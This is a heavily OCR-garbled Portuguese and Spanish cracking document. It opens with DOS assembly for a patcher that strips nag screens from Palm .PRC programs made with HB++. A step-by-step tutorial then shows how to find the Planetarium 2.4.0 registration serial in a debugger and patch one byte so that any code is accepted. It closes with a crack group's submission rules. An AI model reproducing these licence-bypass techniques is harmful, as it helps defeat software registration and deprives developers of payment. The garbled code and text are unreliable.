cmp vord ptr [si], 03b8h ¿pri rmeira execucáo? 
mov Ccx,finish-start ] 
jz finish ¿sim criptografa o prograrra 
decrypt: E 
xor byte ptr [si], lch ;descri ptografa o programa 


inc si ; próxi no byte 


loop decrypt ; 
program ; 
nov ax, 0003h ; 
int 10h ¿set video node (fake CLS) 
nov ah, 09h ] 
lea dx, [wV5g9] ;exi be cabecal ho 
int 21h ; 
push cs ; 
push cs ; 
pop ds ¡D5 =ES =CS 
pop es ; 
mov si,offset [0082h] ¿SI =o0ffset da linha de comandos 
cmp vord ptr [si], 3f2fh ¡ajuda soli citada? 
jz ajuda ¿sim exibe a ajuda. 
mov ah, 09h ; 
lea dx, [wWgl] : 
int 21h ¿exi be nensagem 
mov cx, 0008h ;tamanho do norme do arqui vo 
lea di,[wPrc] ¡DI = none do arqui vo 
pegaTecla: : 
xor ah,ah ; 
int 16h ;1é teclado 
cmp al, 0Odh ; ENTER pressi onado? 
jz  finPegaTecla ¿sim termna de ler teclado 
cmp al, 08h ; BACKSPACE pressi onado? 
jnz naoBackSpace ; náo. nao apaga caracter 
cmp cl,08h ¿todas os caracteres apagados? 
jz pegaTecl a ¿sim lé teclado 
dec di ¡DO =últinmo caracter 
Ínc cx ; 
nov byte ptr cs:[di], 00h ¡del eta caracter do nome do arqui vo 
call ecoaTela ¿mostra na tela 
nov ax, 0a20h ;escreve na tela 
xor bx, bx ;umespaco em branco 
push cx ; sem mover o cursor 
mov cx, 0001h ; 
int 10h ; 
pop cx : 
jrmp pegaTecla ;1é teclado 
naoBackSpace: ] 
call ecoaTela ¿mostra na tela 
stosb ¿sal va caracter 
loop pegaTecla ;1é teclado 
fi mPegaTecl a: ; 
nov cx, 0005h : 


lea si,[wExt] ¿SI =extensáo do ar qui vo 


repne novsb ¿adi ci ona extensáo 

XOr  CX,CX ¡CxX=0 

nov ah, 4eh ; 

lea dx,[wPrc] procura arqui vo no di retório corrente 
int 21h ; encont r ou? 

je ar qui voNaoEncont rado ;náo. exibe mensagem de erro 

nov ax, 3d00h ¡abre arqui vo 

lea dx,[wPrc] ¿somente leitura 

int 21h ¿abri u? 

je erroAbri ndoAr qui vo ;náo. exibe mensagem de erro 

mov vord ptr cs: [wHandl eOri gen, ax ¿sal va handl e do arqui vo 

nov bx, ax ¿bx = handl e 
nov ax, 4202h ¡Vai para o final do arqui vo 

XOr  CX,CX ; high order 

xor dx, dx ; low order 

int 21h : 

mov word ptr cs:[vwDX], dx ¿sal va high order do tamanho do ar qui vo 
nov ax, 4200h ¡Val para o início do arqui vo 


XOr  CX,CX : 
xor dx, dx ; 


int 21h - 

nov ah, 3ch ¿cria arqui vo de saí da 

xXOr  CX,CX ¿sematri butos 

lea dx, [vwPtch] ; 

int 21h ¿cri ou? 

je erroCri andoAr qui vo ;náo. exibe mensagem de erro 

mov word ptr cs: [vHandl eDesti no], ax ¿sal va handle do arqui vo de saí da 


| eAr qui voDeEnt rada: ; 
nov cx, wlanmanho ; CX = tamanho do buf fer 


conti nuaLendo: 


cal! l|eaArqui vo ;lé arqui vo 
Mov  CX, ax ¿CX = quanti dade de bytes li dos 
push cx ; 
push cx ] 
cmp byte ptr cs:[wEncont rada], 01h ¿string já encontrada? 
jz naoEncont r ouNoBuf f er ¿sim náo procura mais 
mov al,byte ptr cs:[vw£tri ng] ¡AL =prineiro caracter da string 
lea di,[wBuffer] ;D = buffer 
pri mei raVez: ; 
cmp byte ptr cs:[vwProcurando], 00h ¡se parte da string estava no buffer anterior 
jnz conti nuaProcurando ¿conti nua procurando o resto da string no buffer atua 
repne scasb ¿procura a prineira letra da string 
test CxX, cx ; encont r ou? 


jz naoEncont r ouNoBuf f er ¿náo. lé próxinos 4K 


push 
nov 
l ea 


j mp 


cx 
cx, 0O09h 
si,[wS5tri ng+01h] 
procuraStri ng 


conti nuaPr ocur ando: 


dec 
nov 
sub 
nov 
xchg 
sub 
xor 


si 

CX, si 

cx, Offset w£tri ng 
ch, Oah 

ch, cl 

cl, ch 

ch, ch 


procuraStri ng: 


repe 
pop 
pz 
NOV 
crp 
jz 
NOV 

j mp 


cmpsb 

cx 

encont rousStri ng 

byte ptr cs:[wProcurando], 01h 
di, offset wFi mBuf f er 
naoEncont r ouNoBuf f er 

byte ptr cs:[wProcurando], 00h 
pri mei raVez 


encont rousStri ng: 


nov 
add 


byte ptr cs:[wEncont rada], 01h 
di, 85h 

al, byte ptr cs: [di] 

al, 66h 

al, 60h 

byte ptr cs:[di], al 


naoEncont r ouNoBuf f er : 


cx 
gr avaBuf f er 

cx 

cx, WTamanho 

conti nuaLendo 

vord ptr cs: [wDX] 

dx, wrd ptr cs: [vwDX] 

dx, OFFFFh 

| eAr qui voDeEnt rada 

ah, 3eh 

bx, word ptr cs: [wHandl eOri gen 
21h 

ah, 3eh 

bx, word ptr cs: [wHandl eDesti no] 
21h 

byte ptr cs:[wEncont rada], 01h 


¿sal va posicáo da letra no buffer 

; CX =tamanho restante da string 

¿Sl =string a partir do segundo caracter 
¡verifica resto da string 


, 


¿CX = ponto a continuar a procura na na string 
¿;CX = bytes já comparados da string 
¡CH = 10 


¡troca CH com CL 

¿subtrai bytes já comparados de 10 = bytes a comparar 
¡CH =0 

; compara string emSl combuffer 

; restaura 

; patch se encontrou string 

procura de onde parou 

¡Dr =fimdo buffer? 

¿sim lé próxiros 4K 

;reseta procura 


;encontrou a string 

¡DO =fimda string no buffer + 134 bytes 
¡AL = byte na posicao Di 

; XOR comBEQ pra obter a chave 

; XOR da chave com BRA 

¿sal va novo byte (patch) 


¡restaura n2 de bytes li dos 
¿grava buffer 
¡restaura n2 de bytes li dos 


¿náo. lé arqui vo 

;decrenenta high order do tananho do arqui vo 
;DX = high order do tamanho do arqui vo 

¿todo o arqui vo li do? 

¿náo. lé arqui vo 

¡fecha arqui vo 

¿de ori gem 


¿fecha arqui vo 
; de desti no 


, 


; patch ef et uado? 


jz pat chEf et uado 


push cs 

pop ds 

nov ah, 41h 

lea dx, ds: [wPtch] 
int 21h 


je erroDel et andoAr qui vo 
jrmp erroPatch 


jmpo fim 
pat chEf et uado: 
lea dx, [wW5gl10] 
mostraErro 
nov ax, 0901h 
int 21h 
fim 
nov ah, 4ch 
int 21h 
| eAr qui vo: 
nov ah, 3fh 


mov bx,word ptr cs: [wHandl eOri gen 


lea dx,[wBuffer] 
int 21h 
ret 


gravaBuffer: 
pus hf 
pus ha 
push cx 
nov ax, 4202h 


mov bx,word ptr cs: [wHandl eDesti no] 


XOr  CX,CX 
xor dx, dx 


int 21h 

pop  Cx 

nov ah, 40h 

lea dx,[wBuffer] 

int 21h 

popa 

popf 

ret 
ecoaTel a: 

nov ah, 0eh 

int 10h 


ret 


¿sim exibe mensagem 

¡DS =CS 

; del eta 

;arqui vo de saí da 

; del et ou? 

;náo. exibe mensagem de erro 
; patch náo ef et uado 

¡retorna ao DOS 


; exi be mensagem 


;termna programa 


, 


;lé arqui vo 


* BX = handl e 
: DX = buffer 


, 
, 


, 


¿sal va flags 

¿sal va regi sters 
¿sal va 

¡Vai para o final do arqui vo 
; BX = handl e 

; hi gh order 

¿low order 

; restaura 

¿grava no arqui vo 

; DX = buffer 
¡restaura registers 
¡restaura flags 


“mostra na tela 
; rmodo tel et ype 


erroAbri 
l ea 
j mp 
erroCri a 
nov 
nov 
int 
l ea 
j mp 


ar qui voNaoEncont rado: 


l ea 
j mp 
ajuda: 
nov 
l ea 
int 
j mp 


erroDel et andoAr qui vo: 


l ea 

j mp 
erroPat c 

l ea 

j mp 
wlananho 
wWó gl 
vwW5 g2 
wW5 g3 
vWWE g4 
vwW5 g7 
vwWE g8 
vwWE g6 


wW5g10 


ndoAr qui vo: 


dx, [ wWbEg2] 
mostraErro 


ndoAr qui vo: 


ah, 3eh 

bx, wHandl e 
21h 

dx, [ wWEg3] 
mostraErro 


dx, [ wWbEg4] 
mostraErro 


ah, 09h 
dx, [ wWbEg6] 
21h 

fim 


dx, [ wWbEg7] 

mostraErro 

h 

dx, [ wWbEg8] 

mostraErro 
equ 
db 


, 


¡erro ao abrir arqui vo 


, 


¡fecha arqui vo 
Ori gem ; de ori gem 


erro ao criar arqui vo de desti no 


;arqui vo náo encontrado 


;exibe a ajuda 


¡erro ao del etar o arqui vo 


¡patch náo ef et uado 


, 


1000h 
' Arqui vo .PRC para patchear (max. 8 caracteres s/ extensáo): $ 
Odh, Oah, ' Erro ao abrir o arqui vo.' , Odh, Oah, 07h, 24h 
Odh, Oah, ' Erro ao criar arqui vo de saí da.' , Odh, Oah, 07h, 24h 
Odh, Oah, ' Arqui vo náo encontrado. ', Odh, Oah, 07h, 24h 
Odh, Oah, ' Erro ao deletar o arqui vo.' , Odh, Oah, 07h, 24h 
Odh, Oah, ' Patch náo efetuado. ' , Odh, Oah, 07h, 24h 
Odh, Oah, ' Esse programa foi escrito para patchear arqui vos de programas para Pal mop ' 
Odh, Oah, ' cri ados no HBW++ versáo 1.05 náo registrado.', Odh, Oah 
Odh, Oah, ' O patch consiste emalterar um único byte do arqui vo .PRC de nodo que a nag' 
Odh, Oah, ' screen exi bi da quando o programa é executado náo mais apareca.' , Odh, Oah 
Odh, Oah, ' Si ntaxe: ' , Odh, Oah 
Odh, Oah, ' PATCHPRC' , Odh, Oah 
Odh, Oah, ' | nforme o nome do arqui vo comno náxiro 8 caracteres SEM extensáo. ' 
Odh, Oah, ' A extensáo .PRC é assum da automati canente.', Odh, Oah 
Odh, Oah, ' Será cri ado um arqui vo chanado PATCHED. PRC' 
Odh, Oah, ' Esse arqui vo é o arqui vo ori gi nal patcheado. O arqui vo ori gi nal é manti do.' 
Odh, Oah, Odh, Oah, 24h 
Odh, Oah, ' Patch ef etuado comsucesso.' , Odh, Oah, 07h, 24h 


v£tri ng db ' True' , 00h, ' Fal se' 


wPtch db ' Patched. prc' , 00h 
wWExt db '.pre', 00h 
vDX dw 0000h 


vwHandl eOri gem dw 0000h 
vwHandl eDesti no dw 0000h 
vwPr ocur ando db 00h 
wEncont rada db 00h 


wPr c db Odh dup( 0) 
vBuf f er db wlamanho dup( 0) 
wFi mBuf f er db 00h 
finish: ; 
xor byte ptr [si], lch ¿cri ptografa programa 
inc si ; próxi no byte 
loop finish ; 
nov ah, 3ch ¿cria arqui vo 
lea dx,[wfile] ; DX=ar qui vo 
xXOr  CX,CX ;tamanho zero 
int 21h : 
nov bx, ax ; BX = handl e 
nov ah, 3eh ¡fecha arqui vo 
int 21h : 
nov ax, 3d01h ¡abre arqui vo somente escrita 
lea dx,[wfile] ; DX=ar qui vo 
int 21h F 
nov bx, ax ; BX = handl e 
nov ax, 4000h ; grava emarqui vo 
mov Ccx,finish-start ¿;CX = tamanho do programa 
lea dx,[start] ¿DX =início do programa 
int 21h : 
nov ah, 3eh ¡fecha arqui vo 
int 21h ; 
jmp start vai para o início 


wile db ' PatchPRC. COM , 00h 


end start 
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INTRODUCCION 


Como patchear o Planetaruim versáo 2.4.0 


O Planetarium é um ótimo programa para astrónomos amadores. 


Ele tem uma biblioteca com dados de vários corpos celestes, mapa do céu, etc.etc. 
etc. 


A versáo náo registrada é full, ou seja, tem todas as funcionalidades. O autor 
do programa alerta que após certo tempo, uma nag screen aparece a todo o momento 
lembrando o usuário de registrar o programa. 


AL ATAQUE 
Planetaruim versáo 2.4.0 


Planetarium 
version 2.4.0 


Unregistered version 
This opplicatiorn is +horewore. 
Please register it. 

Info about re ation at 
httpre i 
e-mail: plore 
LisinastardatabasermTin AA. 


Fig. 1 


O Planetarium é um ótimo programa para astrónomos amadores. 


Ele tem uma biblioteca com dados de vários corpos celestes, mapa do céu, etc.etc.etc. 


A versáo náo registrada é full, ou seja, tem todas as funcionalidades. O autor do programa alerta que após certo tempo, uma nag screen 
aparece a todo o momento lembrando o usuário de registrar o programa. 


Planetarium 


er] [Concel ] 


Fig. 2 


A fig. 2 mostra a tela de registro. Notamos que é um registro simples. Náo é baseado no HotSync name nem na ID da ROM. 


Isso torna as coisas mais fáceis. 


Planetariumn ES 


oa Paz Te mb.0 + 


D Sorry, wrong code. 


[ Done ] 


Fig. 3 


Ao digitar um código inválido a Talt da fig. 3 aparece. 


Planet24.prc - Palm Application Explorer 
File Edit View Help 


> 


= Planet24.pro 


+) BLST (9) 
+. MBAR (6) 
+ NENT (4) 
= Talt (19) 


Tbmp (14) 
code (7) 
data (1) 
nfnt (2) 
sKEst (1) 
tAIB (2) 
tAIN (1) 
tAIS (4) 
EFRM (32) 
ESTL (15) 
ESTR (29) 
tdat (25) 
time (1) 
tver (1) 


+-4)-4-4-4-4-4-4-44-4-4-4-4-E 


¡¿ Iniciar 


(1 


LJ 


Resource size: 41 bytes 


File offset: OxB79B2 [42437 


Register 


Sorry, wrong code. 


| Dune 


000: 


0010: 


"EE 


Do 00 00 00 00 
DO 53 6F 72 72 


64 65 2E 00 44 


Mr G:iNova ... 


6F 6E 65 00 


7) Planetari... 


=' Palm OS... 


southDe... 


NA a Register 
3 6F «SOLXY, Wrong co 
de. .Done. 


E couthDe... 


Planet24... 


Fig. 


4 


PT MSYDM ñ £)2 1368 00:13 


Vamos procurar essa Talt utilizando o PRCExplorer conforme a fig. 4. 


(0x04d4). 


Podemos observar que o ID da Talt é 1236 


Wer Tools Window Help 
da al ACP | code0001.s | codeD002 : | code0003.s  codeDDD4. s 
al 
FE Resources DODO06 MOVEO H0,D4 A 
+ 03 Forms 06 Talt encon- ME MOVEA.W D4,40 
=$) Alerts O trada no MOVE.L  240,D3 
+) fa LEA (377,240 
H-- + 00 PRCExplorer MOVE.B DS5,0O(A0,D3.Lj 
+ 00 LEA -6679 145) ,40 
- DODO MOVE.B  DS,DO 
OO0o 03035 ADD.B O(20,D3.L),DO 
+) 4 1237 Talt.08 DODo 1a00 MOVE.BE-  DO,DS 
% 2454 Informa? 0000692 5244 ADDO.W. H1,D4 
+ 2455 Selec 00006594 00340007 CMPI.V  F7,D4 
+ 00 5 bdez BLT L640 
0o0o0o0éb9a 4357 PEA (147) 
o00o0é6bSce ¿f0a MOVE.L  42,-(47) 
DODO q4e4faDca TRAP H15,$20CA = sysTrap3trCaselessCompare 
DAR DOBLE CLICK AQUI. 0000 3340 TST.W 10 
HERE DOUBLE CLICK 0000 Ss co SEQ 
00 49400 NEG.B 
Oo000 1b40cdea MOVE.B 
ODO 5049f ADDO.W 
DODO qazdedea L641 TS3T.BE 
-..a referáncia OOOO 67185 BEG 
aparece!!! ajajaja MOVE.B 
ODO MOVE.B 
(Nos manda a aqui) 0000 MOVE . U 
DOo0 4e4fal92 TRAP 
ajajaja 544f ADDO.W 
DODO 6O0Da BRA 
ono 4e4fal92 TRAP 
00 544f ADDO.W 
00 3?97conoo0100Z20c L643 MOVE . W 
00 MOVE. L 
00 J3R 
00 2001 MOVEO 
OD 4fefO000e LEA — 
00 ó6b0la ERA 
D0bbea 2fOb L644 MOVE.L  43,-(147 
O00óbbec q4eadI265 JSR -3450/245] v 
£ > ¡|< | > 
In8s19 Col1 


— m8519,Col1 | A 


In no 


¡3 Iniciar * oO Me Giova... UN Planetari... —/ Palm OS... E 'southDe... * southDe... ¿ 4 Preedit 


Fig.5 
Localizamos a Talt no PRCEdit. 
Verificamos no código em destaque da fig. 5 que há um sysTrapStrCaselessCompare antes da Talt. 


Concluímos que o programa compara 2 strings e se forem diferentes aparece a Talt de código de registro inválido, ou seja, conforme o 
código, se a comparacáo falhar, o fluxo é desviado pela instrucáo BEQ L642 para o label 1642 que exibe a Talt de registro inválido. 


Entáo, conforme podemos observar, o programa compara o que o usuário digitou com alguma outra string. Devemos descobrir que string é 
essa. 


5 southDebugger vi.7 - 


File Execution Window Tools Plugins Help 


EEE ARO, 
disassembler breakpoints trap stack 


[ main | 
TT E Y 7H 


breakpoints 


NOT SET El 


NOT SET 
NOT SET 
NOT SET 
NOT SET 

06] 


[1007 


í ADC: TrapStrCompare paprrarlerel 
YUU ¿DELE SO sysTrapStrIToi 

ANT NO.. 4E4FALZ9B [AOCA] sysTrapStrCaselessCompare rapFrmbotoForm]) 
plan Ac. tE O sysTrapStriToH 

An e A TrapStrChr 

o007?DSOoo 4 £6D000FF34 TrapStrStr 

O007D . 3F3COSEB ysTrapStrATol 

DO0O07?DSOS NO.. 4E4FA192 sysTrapStrTolower rapFrmilert] 
OO00?DSoc A S6000FFZS S Ñ 

0007?DS10 Bf 4240 

o007?DS1Z E 2 4CEEOC3IS FF A an 2/A3 
0007D518 y 4ESE ES 

o0o0?DS1A Hu 4E75 set remove cancel 

oO00?DS1C Nu... 4ES560000 

OO0O07?DSZO H..32 43E71 MOVEM.L 24A43A2/D4A DS, -(A7) 


O0O7D5sZd Es. 45EDE210 LEA $-5728!1$-1660(AS5), AZ 


D0O07DSzd ): NEON 45EDE22A0 LEA , 42 
A ad, 
DO D1 D2 D3 D4 D5 D6 D? USP 


[0007D2F4-0007D51C]: 


001DDDS8 4E4FA192 TRAP H15!5F, F41362 54192 [sysTrapFrmilert] 


A - _ ". - » > 
¿Iniciar "OQ >” rcGinova.. Ulplanetari... | PalmOS... | ÉIsouthDe..  "southDe.. |<. Preedit pr msvom E €)3 2088 00:16 


L 


Fig. 6 


Pra isso, devemos setar um breakpoint no southDebugger para a trap sysTrapStrCaselessCompare conforme a fig. 6. 
Após isso, teclamos F5 e digitamos novamente um registro inválido. O southDebugger pára no breakpoint. 


A partir daí vamos analisatr.. 


> southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


¡Bl (68) 08 1515 00 


J 


| disassembler | breakpoints | trap stack 


main | 


¡8 disassembler 


peros Tejar 


address All: ascii He ] co command 


OO1DDDOC 8. 3800 MOVE. DO, D4 


OO1DDDOE Asi 41EDESEE LEA H-6674 137-1412 125), A0 O que digitamos = 12345678901234 
O01DDD12 ms 1005 MOVE.E- — D5, DO O registro válido esperado = apollo 
OO1DDD14 -D8. 8 ¿DD.B É$0120,D3), DO 
DO1D DIS A 12400 MOVE.E DO, DS 
O01DDDLA BD 3e4e 2EBO- > EL Número que escribimos=12345678901234 
) 02440007 CMPI.V 37, Dá - : z A 
Hed ¡Ma ó registro bueno si se tiene-apollo 
ÉDEZ BLT f-30!1£-1E ¡¿¡OO1DDDO4 


4857 


¿FOA 


PEA 


4400 
1JE4OCDEA 
504F 
422DCDEA 


impareíconst Char*st, constChar*s2) 
modifver | type | name | value 


const Char E bid 


qa TSiicon=t Char ' 
q. BEN const Char 
DO1DDD3C eN PE 1B9COO1ECDEC mo 
OD1DDD42 Ea) LOPE 1B?COO1ECDEE mo | 
OO1DDD 43 PE ; mo 
OOIDDD4C NO... 4E4FA1592 TE 
DOO1DDDSO TO 544F ¿DI | 
A0 á1 A2 A3 
DO D1 D2 D3 
' | 
[001DDCB8-001DDD92]: his function is not full implemented yet. | still need full reference lists Ñ 
JJ PTcanpo o da 
a 
O01DD TRAP H15!5F, F41162520CA [sysTrap3trCaseles 


PAI gas 


HE iniciar O” MGiiova... UU) Planetari... 


= PalmOS... southDe. .. 


Fig. 7 


ss Preedit pr rmavo E €) 2H 00:17 


Após a parada no breakpoint, abrimos uma jJanela Trap stack do southDebugger e podemos observar o registro que digitamos (no caso 
12345678901234) e a string com a qual ele compara: apollo 


Esse é o registro que ele esperava, veja fig. 7. 


Já que descobrimos o serial, podemos digitar apollo e validamos nosso programa. Entretanto, 


QUALQUER registro como válido. 


Pra isso, vamos analisar a trap sysTrapStrCaselessCompare: 


Essa trap precisa de 2 argumentos, ou seja, 2 strings a serem comparadas. 


Essas strings sáo colocadas na pilha (stack), por meio de PUSHes dos seus enderecos. 


queremos patchear o programa para aceitar 


= southDebugger v1.7 - UNREGISTERED ac 
File Execution VYindow Tools Plugins Help 


¡Bite CE ¡512 O 


| disassembler Ñ breakpoints | memory dump [40] | memory dump [40] | 


[ main | 


O memory dump [42] 


command | notes 


1 
ales 


1 32 33 34 35 36 37 38 39 30 
o.) 00 00 10 00 00 00 42 00 00 ¡a ¿A O A 
00 00 00 14 12 00 3E OE 32 68 2C 33 30 EJCP 6d ...... 


ñ 
Fa 
ey 


LD 


DO 


00 


30 


mn 


00009120 00 02 EE 1E co 00 00 00 00 00 90:00 OD oia 
DOOOS1EC 00 00 00 SF 00 SFE 00 02 EE DO: 00:03: DA- AO conidios 


O 
e 
y] 
(us) 
oO 
oO 
oO 
o 
a 


O 30 det 3B 6 o E? NA 


A. A ¿DO1DDDOd 


2 po 00 00 


a 
a 
a 
a 
w 
pu 
a 
a 
o 
o 
a 
Pa 
o] 
es] 


E 


TSTU DO 


OO01DDDEC S57co 
DO1DD 
OO0l1DD 


001DD 


O memory dump [47] 


34400 
1E4OCTEA 
504F 


00036914 


| 7] e] aJ10]' 


1]2J]3J]4 


: 10 ñ 
OO1DDD36 422DCDES RS e = E O 12 = = 
4 00 00 91 £c 00 Q B9 1C 61 70 6F €C€ €C 6F 00 54 ...1..., 


6718 


DO1DD 


MO Gi 


o 0 
JO € 
o 
a] 
o 


oo 00 00 o 00 00 00 00 00 00 03 D1 01 00 03 2.......... 
OO1DDDZC y 7CODLECDEC 
AUERa a 92 30 00 03 ES ES 00 18 ES 46 00 03 E9 ES 00 03 ......... 
OO1DDD4Z 1E?COOLECDEB A IN De Ha e la SS 

39 390 00 ES DA 00 00 10 06 ..........8.... 


Y 
> 
he 
2 hos 
le] 


[ua 

oO 
wo 
oo 
OO 
O EP 
o m 
Un] 


o 
o 
Lo 


DO 00 1 AAA AA 
24 00 00 


Es 00 03 
0 


md 


3F3C04D3 
4E4FA192 
544F 


DO1DDD48 
DO01DDD4C 
OD1IDDDSO 


oO 
JOY í 


2 90 000 00 0 


a 


He 
te 
S 
( 

a 


9 
El 
3 OE 00 
9 
3 


o 
br 

mad 
OS 


o 
E 
e 
m 
E 
a 
ES 
O O fñ$ 
o Rod 
o Pu] 
o a 
Lo Ti 
lo momo 


30 00 00 00 2 00 0. 


o 
(=] 
o 
[08] 


A 
A la 
to 
E 


y te 
105] 
ra 
o 


o 
DD 


AO A1 A2 A3 De 
DO D1 D2 D3 | a 1 
I[001DDCB8-001DDD92]: D D5 D D? USP 

7 | $ — > e 


O0003B934 BA CS 20 00 00 


n Dt 
1D 


£2 500 0 


B 
Ba 


00290 


E 
E 


DO1DDDZ26 4E4FADCA TRAP H15!5F, F$41162540CA [sysTrapStrCaselessCompare] 


as 


¡¿ Iniciar *íQ M G:iova...  Ul Planetari... =i PalmOS... £2 southDe... * couthDe... : + Preedit 1 6 2,2881 00:19 


Assim no código abaixo, a instrucáo PEA (A7) coloca o endereco de A7 na pilha. 
A7 aponta para a string apollo (fig. 8). 


A instrucáo seguinte MOVE.L A2,-(A7), coloca na pilha o endereco de A2. 
A2 aponta para o registro que digitamos (12345678901234) conforme fig. 8. 


Observemos o destaque no código abaixo: 


00006b90 1a00 MOVE .B DO,D5 
00006b92 5244 ADDO.W $+1,D4 
0c440007 $+7,D4 


CMPI.W 


PEA (M7) 
MOVE .L A2,-(A7) 
TRAP”— H15,$40CA = sysTrapitrCas ssCompare 
00006ba4 57c0 SEO DO 
00006ba6 4400 NEG.B DO 
00006ba8 1b40cdea MOVE.B DO0O,-12822(A5) 
00006bac 504f ADDO.W $8,A7 
00006bae 4a2dcdea L641 TST.B -12822(A5) 
00006bb2 6718 BEO 1642 
00006bb4 1b7c00lecdec MOVE.B $30!$1le,-12820(A5) 
00006bba 1b7c00lecdeb MOVE.B $30!$1le,-12821(A5) 
00006bc0 3f3c04d3 MOVE .W $1235!$4d3,-(A7) ; Register 
00006bc4 4e4fal92 TRAP  +15,5A192 = sysTrapFrmAlert 
00006bc8 544f ADDO.W $2,A7 
00006bca 600a BRA 1643 
00006bcc 3f£3c04d4 1642 MOVE.W $1236!$4d4,-(A7) ; Register 
00006bd0 4e4fal92 TRAP.— +$15,$A192 = sysTrapFrmAlert 


00006bd4 544f ADDO.W $2,A7 


Devemos entáo fazer com que o programa compare SEMPRE a mesma string. Isso dará como resultado Sl 


string com ela mesma sempre resultará em registro válido. 


EMPRE 


VERDADEIRO, 


ou seja, 


comparar uma 


> ¿8 (ue $e 


Meus documentos Adobe Reader For UltraEdit-32 Documents To Go 
Palm OS 


Meu computador CorelDRAW 11 Spybot- Search: Palm Quick Install 


a 
> 


D 
a 
InternetEXDIOre! 


De 1 arquivots> copiado“s>. 
Norton a PEA 
SyStemuores Por 


MultiAsciiArt . Microsoft Office Hp48G+.EXE 
a AAA cr a_c E TIN 


A 


Zx Spectrum Multimedia Xplorer 2. Internet Yahoo 


15 NIC 


XPalmiCrackxPRCEdit > 


—. 
5 
— 


Visdata 


8 Y ho 
la] ) 


Bounce Out Blitz CubisDeluxe Tactical Ops 


5, yr 


Delta Force Black Delta Force Xtreme 
Hawk Down 


SAA 


ad 
a» 
The Incredible Fliperama Lemmings 


Machine 


Borland C++ Turbo Pascal 


ATA qe 
a TIA Paint 


PRCedit PRCExplorer 


En 


Palm Emulator Palm File Transfer 
Serial2k southDebugger 


Microsoft Yisual HB++ Integrated 
Basic 6.0 Development E... 


eco. Pr maso O JNE 00:24 


DOSBox 


Vamos alterar a instrucáo PEA (A7) para PEA (A2). 


Pp. 
P 


A (A7) = Push Effective Address A7 coloca o endereco de A7 na pilha 
A (A2) Push Effective Address A2 coloca o endereco de A2 na pilha 


a E 


Conforme podemos observar no destaque do código, o opcode de PEA (A7) é 4857. 


Qual o opcode de PEA (A2) 2??? 


Para descobrir, podemos utilizar Oo ASM68K.EXE. 


Conforme a fig. 9 criamos um arquivo qualquer (TESTE.ASM) e digitamos: 


nop ¡só pra separar os comandos e facilitar a visualizacáo 
nop ¡só pra separar os comandos e facilitar a visualizacáo 
pea (a7) 

nop ¡só pra separar os comandos e facilitar a visualizacáo 
nop ¿só pra separar os comandos e facilitar a visualizacáo 
nop ¿só pra separar os comandos e facilitar a visualizacáo 
pea (a2) 

nop ¿só pra separar os comandos e facilitar a visualizacáo 
nop ¡só pra separar os comandos e facilitar a visualizacáo 


¡WINDOWSisystem32icmd.exe 


ESNARQUIUVI1N xPalmiCrackxPRCEdit>asm68k teste 
ASM6G8K Version 5.8, 1/11/85 


9 lines processed. 
M warnings. 
MB fatals. 


EzNARQUIUVLN XPalmiCrackxPRCEdit > 


Fig. 10 


Agora compilamos com o ASM68K conforme a fig. 10. 


ca. C:WINDOWSisystem32cmd.exe 


VI 


ca e 


22 reserved symbols, M user symbols 


Reserved Symbols 

49089008 
655151515] 
990981 2 
BB0BBB1 
B090B3 
8909985 
5515151514 
BBBBB1 
8090083 
61515151565 
6515151514 


OPCODES 


DDIDDDOCoUO a 


R 
R 
R 
D 
D 
D 
D 
ñ 
A 
A 
ñ 


BBBBB6 


9 lines processed. 
M varnings. 
BM fatals. 


Ez NARQUIUMIN NXPalmiCrackXPRCEdit>,, 


Fig. 11 


Após a compilagáo verificamos o conteúdo do arquivo .LST criado. No caso TESTE.LST, conforme a fig. 11. 


Verificamos que o opcode de PEA (A7) = 4857 e que o opcode de PEA (A2) = 4852. 


Preedit - [E-Wrquivos de ProgramasiStanleyPalmiCrack'PRCsPlanet24.patched. pre] 
+ File Edit Insert View Tools Wtindow Help -0oX 
Planet24 patched.pre | RCP | coded001.s | coded002s | code0003.s | code0004.s| code0005.s | codeb006 s | 
e Res Ox 200: 2F00 2248 BFDO 244E ADFS D6SF SCFF FF48— ."Ho.*N-00%<p7 
-9 Far mms 42D0: 6EFD0O ADF3 AC4F EFDO 141F 3000 694 0. ,N-ó-01...4<. 
E Y Alerts 42E0: ADF7? 2416 002F 2F00 222F 3000 0400 944E  -=5 
E DAS 42F0: ADF1 B41F 034E ADF7 243F 3CFF FF48 6FDO 
€ dl 300: 2E4E ADF3 AC4F EFOO 3626 1F4E 752F 0424 
6F00 0030 1204 4000 0967 0260 1430 2A00 
=>» O0DDEbc : 0604 40 04 BD67 0260 OE2F 2F00 084E ADF2 
1237 Talt. 04D5 24330: 6870 0158 4F60 0C02F 042F 2F00 004E ADF2 
2454 Information 24340: 9250 4F24 5F4E 754F EFFF CE4a8 574E ADF2 
2455 Select Item 4350: 5641 EDES AE2F 4800 0444 2DCD Ea58 4F66 
2456 Delete Item 4360: 103F 3004 B248 6F00 024E ADF2 B65C 4F60 B 
2431 Dielele Al es 370: DESF 3004 BE48 6F00 024E ADF2 B65C 4F41 -N-ÓM0A 
ra : EDES AE2E 8842 6748 6F00 024E ADF2 624F 158. 1Bgtio. -N-0b0 Z 
2459 Constellation EXI AS EA RA e e 
E EFOO 384E 752F DA24 600 083F 3004 z .BHu-.So 2<. EX 
2400 084E 4FA1 805€ 4F3F 002F 2400 2 NOVIO? 
4FA1l 795€ 4F24 5F4E 7545 E71C 304F EFFF. 01y505_NuHe.DO1y 
F626 6F0O0 2224 6F00 2630 1204 4000 0967  o0£80."S0.£0..0..y 
0460 0000 A4E30 2400 0604 4004 CEB67 D0a45 
4067 0000 9060 00004BA3F 3004 CA4E ADF3 bg. 10 17c.É 
4654 4F2F 0584E 4F3 3924 4820 DA58 4F67 PTC 11. NO 1 95H 
3674 6178 0030 ¿426 0841 D711 8538 0041 Xx x 
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Fig. 12 


Voltamos ao PRCEdit, posicionamos o cursor em PEA (A7) e teclamos FO9. 
Alteramos o byte 57 para 52 conforme a fig. 12. 


Salvamos e fazemos o HotSync do Planet24.patched.pre 


(3) Registration OK 


[ Done 1 


Fig. -13 
Executamos o programa e digitamos qualquer registro. 
A Talt da fig. 13 é exibida. 
Seu programa agora está registrado. 
Copourright de 
Andreas Hofe 
Fig. 14 


Fig. 15 


O menu Register permanece, porém ao tentar registrar novamente a Talt da fig. 15 é exibida. 
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1.- Deberás enviar el archivo Original y el crackeado y el tutorial Zipeados 


2.- los manuales solo deberán estar en formato PDF , DOC, TXT, HTM HTML 


